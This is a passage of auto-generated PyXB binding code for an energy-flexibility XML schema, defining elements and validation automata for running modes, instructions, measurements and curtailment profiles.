AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3)))
AdjustableContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=AdjustableContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3)))
def _BuildAutomaton_39 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_39
del _BuildAutomaton_39
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
counters.add(cc_5)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(AdjustableContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
AdjustableContinuousRunningModeData._Automaton = _BuildAutomaton_39()
AdjustableRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), AdjustableDiscreteRunningMode, scope=AdjustableRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 873, 4)))
AdjustableRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), AdjustableContinuousRunningMode, scope=AdjustableRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 874, 4)))
def _BuildAutomaton_40 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_40
del _BuildAutomaton_40
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(AdjustableRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 873, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(AdjustableRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 874, 4))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
AdjustableRunningModes._Automaton = _BuildAutomaton_40()
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay'), pyxb.binding.datatypes.duration, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5)))
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription'), DeviceDescription, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5)))
FlexibilityRegistration._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currency'), CurrencyType, scope=FlexibilityRegistration, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5)))
def _BuildAutomaton_41 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_41
del _BuildAutomaton_41
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(FlexibilityRegistration._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
FlexibilityRegistration._Automaton = _BuildAutomaton_41()
FlexibilityUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), Identifier, scope=FlexibilityUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5)))
FlexibilityUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'validFrom'), pyxb.binding.datatypes.dateTime, scope=FlexibilityUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5)))
def _BuildAutomaton_42 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_42
del _BuildAutomaton_42
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(FlexibilityUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(FlexibilityUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(FlexibilityUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
FlexibilityUpdate._Automaton = _BuildAutomaton_42()
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5)))
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), Identifier, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5)))
Instruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction'), pyxb.binding.datatypes.boolean, scope=Instruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5)))
def _BuildAutomaton_43 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_43
del _BuildAutomaton_43
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(Instruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Instruction._Automaton = _BuildAutomaton_43()
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6)))
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'status'), InstructionStatus, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6)))
CTD_ANON_12._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'debugInformation'), pyxb.binding.datatypes.string, scope=CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6)))
def _BuildAutomaton_44 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_44
del _BuildAutomaton_44
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'status')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'debugInformation')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_12._Automaton = _BuildAutomaton_44()
def _BuildAutomaton_45 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_45
del _BuildAutomaton_45
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_13._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_13._Automaton = _BuildAutomaton_45()
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 108, 6)))
def _BuildAutomaton_46 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_46
del _BuildAutomaton_46
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 108, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_14._Automaton = _BuildAutomaton_46()
CurtailmentOption._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange'), CurtailmentRange, scope=CurtailmentOption, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3)))
def _BuildAutomaton_47 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_47
del _BuildAutomaton_47
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CurtailmentOption._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CurtailmentOption._Automaton = _BuildAutomaton_47()
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement'), CTD_ANON_6, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement'), CTD_ANON_7, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement'), CTD_ANON_8, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6)))
def _BuildAutomaton_48 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_48
del _BuildAutomaton_48
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6))
counters.add(cc_2)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_15._Automaton = _BuildAutomaton_48()
CurtailmentProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement'), CurtailmentProfileElement, scope=CurtailmentProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3)))
def _BuildAutomaton_49 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_49
del _BuildAutomaton_49
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CurtailmentProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CurtailmentProfile._Automaton = _BuildAutomaton_49()
